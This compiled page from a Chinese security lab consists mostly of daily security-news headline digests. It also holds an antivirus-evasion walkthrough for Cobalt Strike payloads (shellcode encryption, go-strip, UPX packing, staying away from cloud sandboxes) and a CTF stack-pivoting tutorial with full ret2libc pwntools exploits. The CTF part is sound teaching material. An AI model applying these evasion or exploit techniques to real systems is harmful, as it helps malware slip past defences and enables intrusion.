免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、德国半导体制造商赛米控遭勒索软件攻击，攻击者称窃取了2TB资料 https://www.securityweek.com/power-electronics-manufacturer-semikron-targeted-ransomware-attack 2、NOMAD跨链桥遭黑客攻击损失总额接近 2 亿美元，几乎被清空 https://www.securityweek.com/nearly-200-million-stolen-cryptocurrency-bridge-nomad 3、后量子候选算法-SIKE 被轻松破解 https://thehackernews.com/2022/08/single-core-cpu-cracked-post-quantum.html 4、VirusTotal分析显示大多数恶意软件通过图标模拟合法应用诱骗受害者 https://thehackernews.com/2022/08/virustotal-reveals-most-impersonated.html 5、VMWare 敦促用户修补关键身份验证绕过漏洞 https://threatpost.com/vmware-patch-critical-bug/180346/ 6、最新的 Jenkins 插件公告中包含未修补的 XSS、CSRF 漏洞 https://portswigger.net/daily-swig/jenkins-security-unpatched-xss-csrf-bugs-included-in-latest-plugin-advisory 7、Solana钱包遭大规模盗币事件 https://techcrunch.com/2022/08/03/solana-wallet-hack/ 8、数千个GitHub存储库被Fork后其副本被更改为恶意软件 https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/ 9、研究人员警告针对企业用户的大规模AitM攻击 https://thehackernews.com/2022/08/researchers-warns-of-large-scale-aitm.html 10、应用EvolutionCMS、FUDForum和GitBucket中发现XSS漏洞 https://portswigger.net/daily-swig/trio-of-xss-bugs-in-open-source-web-apps-could-lead-to-complete-system-compromise

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、VMware为身份验证绕过安全漏洞发布紧急补丁 https://www.securityweek.com/vmware-ships-urgent-patch-authentication-bypass-security-hole 2、谷歌修补严重的安卓漏洞，允许通过蓝牙远程执行代码 https://www.securityweek.com/google-patches-critical-android-flaw-allowing-remote-code-execution-bluetooth 3、欧洲导弹制造商 MBDA 否认被黑客入侵系统 https://www.securityweek.com/european-missile-maker-mbda-denies-hackers-breached-systems 4、Gootkit AaaS 恶意软件仍然活跃并使用更新的策略 https://securityaffairs.co/wordpress/133918/malware/gootkit-is-still-active.html 5、新的"ParseThru"参数走私漏洞影响基于 Golang 的应用程序 https://thehackernews.com/2022/08/new-parsethru-parameter-smuggling.html 6、研究人员发现利用浏览器书签同步功能作为隐蔽数据泄露通道的方法 https://www.freebuf.com/news/340801.html 7、黑客窃取了访问 140000 个Wiseasy支付终端的密码 https://techcrunch.com/2022/08/01/wiseasy-android-payment-passwords/ 8、Emotet 下载器文档使用 Regsvr32 执行 https://securityboulevard.com/2022/07/emotet-downloader-document-uses-regsvr32-for-execution/ 9、数以百万计的 Arris 路由器易受路径遍历攻击 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ 10、美国众议院通过了《勒索软件法案》 https://www.secrss.com/articles/45306

前言 红队在HVV中一般使用钓鱼实现突破边界，蓝队通过钓鱼实现溯源反制，但是都离不开一个好的免杀马，这里分享一下自己的免杀过程，过火绒、360杀毒、windows defender以及赛门铁克等主流杀软都没问题。 杀软工作原理 杀软的查杀方式有多种，比如特征识别，是基于各个厂商收集的病毒样本，依据病毒样本提取的病毒特征，所以杀软的能力在一定程度上也取决于病毒库的大小，这种基于特征识别一般是基于静态。启发式的工作原理基本上可以定义为动态查杀或者是机器学习方法的一种查杀手段，会依据可能执行程序或者关注应用系统重要区域行为而做出的查杀行为。 免杀手段 修改特征码，可以根据污点检测的方式定位到触发杀软规则的病毒样本特征，修改明显的特征在一定程度上是可以实现免杀的。 花指令免杀，在程序 shellcode 或特征代码区域增添垃圾指令，增加的垃圾指令不会影响文件执行，在动态查杀或者文件hash对比是校验会不一致。 加壳，比如upx加壳等，一般文件落地后对比哈希值也可绕过杀软。 二次编译，一般用于对shellcode进行二次编译bypass杀软。 poweshell免杀，但是一般防护软件或者系统本身正常调用powershell应用程序的时候都会产生告警，一般的安全设备是过不了的，需要在命令上使用手段绕过安全设备监测。 免杀 CS生成payload 添加监听器，生成payload 下载go-strip.exe,混淆二进制go编译信息 下载地址 https://cdn.githubjs.cf/boy-hack/go-strip/releases/download/v3.0/go-strip_0.3.4_windows_amd64.zip 运行脚本bypass go run main.go 核心内容就是加密方式 shellcode二层加密。 这里没有直接放源码，因为担心样本被打标签，这里推荐几个项目，这里的话尽量使用go不建议python https://github.com/TideSec/BypassAntiVirushttps://github.com/admin360bug/bypasshttps://github.com/hack2fun/BypassAV/blob/master/bypass.cna这里我修改了生成的exe。安装火绒，查杀 CS上线 加壳 另外再加壳测试。地址 https://upx.en.softonic.com/简单的压缩壳 upx.exe -f Go_bypass.exe 加壳后生辰的exe文件大小为406KB 可以看到加壳之前的文件大小为1011kb 修改加壳后的文件名为upx_Go_bypass方便确认上线状态 成功上线，继续查看加壳后的免杀效果 此时火绒对于有加壳前和加壳后的文件都未报毒 虽然加壳前的报毒了，但是加壳后的未报毒。 赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。 总结 多测试总会有新发现，实践起来相对稍微容易一点儿，不过需要注意免杀之后的效果是最重要的。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、ALPHV声称入侵了欧洲燃气管道公司Creos Luxembourg SA https://securityaffairs.co/wordpress/133899/cyber-crime/alphv-blackcat-ransomware-creos-luxembourg.html 2、研究人员发现近 3,200 个移动应用程序泄露 Twitter API 密钥 https://thehackernews.com/2022/08/researchers-discover-nearly-3200-mobile.html 3、CompleteFTP路径遍历漏洞允许攻击者删除服务器文件 https://portswigger.net/daily-swig/completeftp-path-traversal-flaw-allowed-attackers-to-delete-server-files 4、Google Cloud和Google Play漏洞可能导致账户劫持 https://portswigger.net/daily-swig/xss-vulnerabilities-in-google-cloud-google-play-could-lead-to-account-hijacks 5、Gootkit加载器以新的运营策略重新出现 https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html 6、由上万个虚假投资网站瞄准欧洲用户 https://www.bleepingcomputer.com/news/security/huge-network-of-11-000-fake-investment-sites-targets-europe/ 7、Google Play商店现17款DawDropper银行恶意软件 https://www.freebuf.com/news/340693.html 8、西班牙一核安全系统遭黑客攻击，部分地区服务中断数月 https://www.secrss.com/articles/45215 9、CertiK近期发布了《Web3 安全季度报告》攻击数量创历史之最 https://www.freebuf.com/articles/340394.html 10、美国国会议员披露美国司法系统遭到网络攻击，密封文件面临风险 https://www.infosecurity-magazine.com/news/congress-us-court-records-breach/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软发现USB蠕虫攻击"Raspberry Robin"与"EvilCorp"存在联系 https://www.securityweek.com/microsoft-connects-usb-worm-attacks-evilcorp-ransomware-gang 2、朝鲜APT组织Kimsuky利用恶意浏览器扩展从目标邮箱中窃取数据 https://www.securityweek.com/n-korean-apt-uses-browser-extension-steal-emails-foreign-policy-nuclear-targets 3、OneTouchPoint 披露了影响 30 多家医疗保健公司的数据泄露 https://www.securityweek.com/onetouchpoint-discloses-data-breach-impacting-over-30-healthcare-firms 4、绰号 Adrastea的黑客组织声称已经入侵了欧洲导弹制造商 MBDA https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html 5、恶意 Npm 包针对 Discord 用户窃取令牌和银行卡信息 https://threatpost.com/malicious-npm-discord/180327/ 6、大华网络摄像头漏洞可能让攻击者完全控制设备 https://thehackernews.com/2022/07/dahua-ip-camera-vulnerability-could-let.html 7、研究人员警告黑客使用去中心化IPFS网络进行攻击 https://thehackernews.com/2022/07/researchers-warns-of-increase-in.html 8、CISA警告Confluence硬编码凭据漏洞被积极利用 https://thehackernews.com/2022/07/cisa-warns-of-atlassian-confluence-hard.html 9、LockBit勒索软件利用Windows Defender逃避检测 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/ 10、GitHub Actions工作流漏洞可能导致命令执行 https://portswigger.net/daily-swig/github-actions-workflow-flaws-provided-write-access-to-projects-including-logstash

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、最近修补的 Confluence 高危漏洞(CVE-2022-26138)已被利用 https://www.securityweek.com/exploitation-recent-confluence-vulnerability-underway 2、Moxa NPort存在严重漏洞可能导致工业关键基础设施遭破坏性攻击 https://www.securityweek.com/moxa-nport-device-flaws-can-expose-critical-infrastructure-disruptive-attacks 3、LibreOffice 修复了 3 个漏洞，包括代码执行问题 https://securityaffairs.co/wordpress/133775/security/libreoffice-flaws-2.html 4、ENISA 发布"2021年重大电信安全事件相关数据"报告 https://securityaffairs.co/wordpress/133756/reports/telecom-security-incidents-2021-enisa.html 5、在微软默认禁用宏后，攻击者使用ISO、RAR和LNK文件等新的攻击技术 https://securityaffairs.co/wordpress/133764/hacking/attacks-after-microsoft-blocked-macros.html 6、谷歌将计划在其Chrome 中阻止第三方 Cookie 的时间推迟到 2024 年 https://thehackernews.com/2022/07/google-delays-blocking-3rd-party.html 7、恶意软件Amadey Bot 的新版本利用软件破解站点进行传播 https://cyware.com/news/amadey-bots-new-version-spreads-using-software-cracks-11f2a0ac 8、恶意 NPM 包窃取 Discord 令牌和银行卡数据 https://securelist.com/lofylife-malicious-npm-packages/107014/ 9、黑客使用WebAssembly编码的挖矿程序来逃避检测 https://thehackernews.com/2022/07/hackers-increasingly-using-webassembly.html 10、托管服务提供商NetStandard遭黑客攻击网站关闭 https://www.bleepingcomputer.com/news/security/kansas-msp-shuts-down-cloud-services-to-fend-off-cyberattack/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、美国悬赏 1000 万美元以获取有关朝鲜黑客的信息 https://www.securityweek.com/us-offers-10-million-information-north-korean-hackers 2、Nuki 智能锁被发现11个漏洞，包括可能允许攻击者开门 https://www.securityweek.com/nuki-smart-lock-vulnerabilities-allow-hackers-open-doors 3、IBM Security 研究表明数据泄露平均成本超400万美元，创历史新高 https://www.securityweek.com/ibm-security-cost-data-breach-hitting-all-time-highs 4、Google Play 中发现30个应用包含恶意软件，累计下载量超1000 万次 https://thehackernews.com/2022/07/these-28-android-apps-with-10-million.html 5、钓鱼网站假冒DHL追踪页面窃取用户的个人信息 https://blog.sucuri.net/2022/07/dhl-phishing-page-uses-telegram-bot-for-exfiltration.html 6、美国乔治敦大学发布重磅报告，揭露政府持续监视民众的阴谋 https://www.freebuf.com/news/340270.html 7、 美国政府修订发布运输管道网络安全指令文件 https://www.secrss.com/articles/45064 8、报告显示漏洞披露后 15 分钟内，黑客就开始寻找受害者 https://www.zdnet.com/article/race-against-time-hackers-start-hunting-for-victims-just-15-minutes-after-a-bug-is-disclosed/ 9、攻击者越来越多的利用 IIS 扩展来建立隐蔽的后门 https://securityaffairs.co/wordpress/133727/hacking/iis-extensions-backdoors.html 10、微软披露了利用 Windows、Adobe 0day漏洞的奥地利雇佣黑客公司 https://www.securityweek.com/microsoft-catches-austrian-company-exploiting-windows-adobe-zero-days

一、前言 现在的CTF比赛中很难在大型比赛中看到栈溢出类型的赛题，而即使遇到了也是多种利用方式组合出现，尤其以栈迁移配合其他利用方式来达到组合拳的效果，本篇文章意旨通过原理+例题的形式带领读者一步步理解栈迁移的原理以及在ctf中的应用。 二、前置知识 在笔者看来栈迁移的原理其实可以总结为一句话：因为栈溢出字节过少所以劫持rsp寄存器指向攻击者提前布置好payload的内存地址，已达到扩充溢出字节数的目的。 以一个简单的demo1为例，程序源码以及编译指令如下所示： #include <stdio.h> char buf1[0x100]; void main() { char buf2[0x40]; puts("First: "); read(0, buf1, 0x100); puts("Second: "); read(0, buf2, 0x60); } // gcc -fno-stack-protector -no-pie -z lazy -o demo1 demo1.c 程序的流程非常简单存在两个输出，第一次是往全局变量buf1第二次是往局部变量buf2中写入。可以看到在第二次写入时存在明显的栈溢出漏洞，但是溢出的字节数只够写入0x18大小的字节，如果要构造gadget泄露内存地址，最短的ROP链也需要0x20的字节才可以在泄露内存后返回输入点继续执行程序。 在这种情况就可以使用栈迁移的方式来扩大溢出字节数的大小，在前面说过栈迁移的本质就是劫持rsp寄存器指向攻击者提前布置好payload的内存地址，而劫持rsp寄存器的指令有很多，最常用的就是函数的退栈返回指令leave; ret。 可以分成两部分来理解这条指令。首先执行的是leave指令，这条指令共执行了两个操作mov rsp, rbp和pop rbp，其中rsp寄存器的指向变化如下图所示，可以看到在执行完leave指令后rsp寄存器指向了返回地址；随后会执行ret指令，这条指令可以理解成pop rip。因为此时rsp寄存器指向rbp+8即函数的返回地址，所以pop给rip寄存器的就是函数的返 在了解这条指令后不难发现，如果利用溢出漏洞可以覆盖rbp的值为一个已知地址，那么在执行过两次leave; ret指令后，就可以劫持rsp寄存器到任意地址，此时rsp寄存器指向的地址即为新的栈地址，只要事先在新地址处布置好想要执行的rop gadget，那么溢出字节过少这个问题就迎刃而解了。 根据上面介绍的栈迁移原理，可以总结出使用栈迁移的一些必要条件 存在可以劫持程序流和控制rbp寄存器的漏洞 攻击者可以确定准确某一块具有读写权限的地址 在进行栈迁移前需要在这块地址上进行rop gadget布局 三、例题讲解 3.1 例题demo1 在理解了栈迁移的原理后可以通过这个demo来练练手了，进行编译时未开启Canary和PIE保护，NX保护开启防止写入shellcode 这里先将大体的利用思路总结出来，其中的实现细节实现会在下文中进行说明。 未开启PIE保护，可以确定第一次写入的地址记作addr1，在此地址处布置rop gadget来实现泄露LIBC地址并返回主函数 利用第二次写入存在的栈溢出漏洞覆盖rbp为addr1，rip为指令leave; ret的地址实现栈迁移 返回主函数后利用ret2libc执行system("/bin/sh")获取shell 3.1.1 栈迁移布局 首先我们利用第一次输入进行rop chain布局，并利用第二次栈溢出漏洞覆盖rbp为伪栈地址劫持rip为leave; ret指令地址，内存变化如下图所示。 细心的同学会发现，我们在第一次进行rop chain布局前有一小段padding填充在前面，这是因为在我们进行栈迁移后，程序指令中所有对于栈的操作都会在伪栈内进行，而伪栈地址与got表地址相邻，填入这小段padding的目的就是为了避免程序在对伪栈进行读写数据时造成内存数据段内关键信息被覆盖，从而造成crash现象。 在汇编中当我们要对局部变量进行操作时，一般都是用rbp栈底寄存器来定位，如下图所示。这一点在栈迁移中可以让我们构造出一个类似于链表的利用结构，每次布置rop chain时不断将rbp寄存器赋值为伪栈地址，然后跳转到主函数的写入函数处，因为局部变量寻址是通过rbp寄存器，所以我们可以不断进行rop chain的布局。 在第一次进行rop chain的布局中控制rbp寄存器指向新的伪栈地址，那么在返回主函数后执行read函数时，写入地址就是新的伪栈地址，这时只要利用栈溢出漏洞去构造ret2libc即可getshell。 3.1.2 EXP from pwn import * p = process('./demo1') libc = ELF('./demo1').libc fake_stack = 0x601060 leave_ret = 0x40058E puts_plt = 0x400430 puts_got = 0x601018 pop_rdi = 0x4005f3 read_text = 0x400572 payload1 = "a"*0x78+p64(fake_stack+0x408)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(read_text) p.sendafter('First:', payload1) payload2 = 'a'*0x40+p64(fake_stack+0x78)+p64(leave_ret) p.sendafter('Second:', payload2) puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) libc_base = puts_addr - libc.sym['puts'] system = libc_base+libc.sym['system'] sh = libc_base+libc.search('/bin/sh').next() success(hex(libc_base)) payload3 = "a"*0x48+p64(pop_rdi)+p64(sh)+p64(system) p.send(payload3) p.interactive() 3.2 例题demo2 在CTF比赛中通常只有一次写入机会，这边给出demo2的源码以及编译命令。 # include <stdio.h> # include <string.h> void main() { char buf[0x28]; puts("Hello Hacker."); read(0, buf, 0x40); } // gcc -fno-stack-protector -no-pie -z lazy -o demo2 demo2.c 与demo1一样demo2未开启Canary 与PIE保护，不同的是demo2中只有一次输入机会，并且溢出字节数只能覆盖返回地址。 结合之前讲解的栈迁移技巧，首先在劫持rsp前需要进行rop chain布局，程序并没有一次可以往伪栈布局的机会，但是可以利用劫持程序流的方式来构造这一条件。 观察程序的汇编代码如下图所示，在对局部变量buf进行寻址时使用了rbp寄存器，那么我们可以利用这一点配合栈溢出漏洞来实现伪栈上的rop布局。利用思路如下所示，其中的实现细节实现会在下文中进行说明。 利用栈溢出漏洞劫持rbp寄存器为伪栈地址，返回地址为0x40054b(图中主程序的输入函数)，即可在返回主程序后对伪栈进行rop chain的布局 对伪栈进行rop chain的布局，泄露LIBC地址并返回主函数 返回主函数后利用栈溢出漏洞配合栈迁移+ret2libc完成getshell 3.2.1 伪栈rop布局 第一次leave; ret是主函数退栈时执行的，利用栈溢出漏洞覆盖rbp为伪栈地址，rsp为主函数地址。当我们再次来到主函数的输入函数时即可在伪栈上布置rop chain。此时的内存变化如下图所示 第二次leave; ret指令依然来自主函数退栈时执行，在伪栈上布置好rop chain后程序执行退栈操作，此时rbp寄存器内保存fack_stack-0x30的地址即rop chain地址+0x8的位置处，rsp寄存器被劫持到伪栈上，此时的内存变化如下图所示 这里为什么是fake_stack-0x30的地址呢？因为在对局部变量buf进行寻址时使用到rbp寄存器，而本题中的buf地址来自[rbp-0x30]的地址，所以如果想要将rsp劫持到rop chain的位置，就需要对rbp寄存器赋值为fakc_stack-0x30，那么在执行第三次leave的时候，rsp寄存器就劫持到rop chain的地址处，此时的内存变化如下图所示 泄露完LIBC地址后，劫持程序流返回主函数，利用read函数对伪栈进行最后一次rop布局，需要注意此时的写入地址是fake_stack-0x30，所以在栈迁移时rbp寄存器的值为fake_stack-0x30-0x30-0x8的地址处，再执行一次leave; ret时即可将rsp寄存器劫持到ret2libc rop地址处。内存变化如下图所示 3.2.2 EXP from pwn import * context.log_level = 'debug' p = process('./demo1') libc = ELF('./demo1').libc read_text = 0x40054B fake_rbp = 0x601500 pop_rdi = 0x4005d3 # pop rdi; ret; puts_plt = 0x400430 puts_got = 0x601018 leave_ret = 0x400567 # gdb.attach(p, 'b *0x400567') payload1 = 'a'*0x30+p64(fake_rbp)+p64(read_text) p.sendafter("Hello Hacker.", payload1) payload2 = p64(fake_rbp-0x30)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(read_text)+p64(0)+p64(fake_rbp-0x30)+p64(leave_ret) p.send(payload2) puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) libc_base = puts_addr - libc.sym['puts'] system = libc_base+libc.sym['system'] sh = libc_base+libc.search('/bin/sh').next() success(hex(libc_base)) payload3 = p64(pop_rdi)+p64(sh)+p64(system)+p64(0)*3+p64(fake_rbp-0x68)+p64(leave_ret) p.send(payload3) p.interactive()

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、新的钓鱼活动针对LinkedIn上的Facebook 企业帐户 https://www.securityweek.com/new-ducktail-infostealer-targets-facebook-business-accounts-linkedin 2、安全研究人员在技嘉和华硕主板中发现被植入的UEFI Rootkit https://www.securityweek.com/chinese-uefi-rootkit-found-gigabyte-and-asus-motherboards 3、Grails 中的严重安全漏洞可能导致远程代码执行 https://portswigger.net/daily-swig/critical-security-vulnerability-in-grails-could-lead-to-remote-code-execution 4、网络钓鱼攻击猛增，微软和 Facebook 成为被冒充最多的品牌 https://threatpost.com/popular-bait-in-phishing-attacks/180281/ 5、研究人员发现新 LockBit 3.0 和 BlackMatter 勒索软件非常相似 https://thehackernews.com/2022/07/experts-find-similarities-between.html 6、印度保险门户网站Policybazaar遭到入侵数据泄露 https://www.infosecurity-magazine.com/news/indian-insurance-policybazaar/ 7、Windows版Coremail邮件客户端RCE 0day漏洞已被在野利用 https://mp.weixin.qq.com/s/nq3yIInv8-79J_vTnQUzSw 8、美国与英国达成协议，将可互相访问互联网用户数据 https://www.ithome.com/0/631/220.htm 9、企业应用 Confluence 的硬编码密码泄露 https://arstechnica.com/information-technology/2022/07/atlassian-warns-hardcoded-password-flaw-is-likely-to-be-exploited-in-the-wild/ 10、Drupal 开发人员修复了 CMS 中的代码执行漏洞 https://securityaffairs.co/wordpress/133625/security/drupal-flaws-2.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、开源电商平台PrestaShop 确认0day漏洞会导致电商服务器被攻击 https://www.securityweek.com/prestashop-confirms-zero-day-attacks-hitting-ecommerce-servers 2、FileWave 移动设备管理 (MDM) 产品漏洞影响1000多个组织 https://www.securityweek.com/1000-organizations-exposed-remote-attacks-filewave-mdm-vulnerabilities 3、勒索软件组织 Lockbit 声称入侵了意大利税务局并窃取了78GB文件 https://securityaffairs.co/wordpress/133640/cyber-crime/lockbit-ransomware-italian-revenue-agency.html 4、T-Mobile 同意向数据泄露的客户支付 3.5 亿美元 https://www.securityweek.com/t-mobile-settles-pay-350m-customers-data-breach 5、新版本Amadey恶意软件通过SmokeLoader传播 https://asec.ahnlab.com/en/36634/ 6、QBot使用Windows 7计算器侧加载来感染设备 https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/ 7、威胁行为者在黑客论坛上推广的新 Redeemer 勒索软件版本 https://www.bleepingcomputer.com/news/security/new-redeemer-ransomware-version-promoted-on-hacker-forums/ 8、Conti 勒索软件入侵并加密哥斯达黎加政府 https://www.bleepingcomputer.com/news/security/how-conti-ransomware-hacked-and-encrypted-the-costa-rican-government/ 9、加拿大圣玛丽小镇遭到LockBit勒索软件攻击数据泄露 https://www.databreaches.net/an-entire-canadian-town-is-being-extorted-by-ransomware-cyber-criminals/ 10、Magecart 活动入侵订餐平台以窃取 300 多家餐厅的付款数据 https://thehackernews.com/2022/07/magecart-hacks-online-food-ordering.html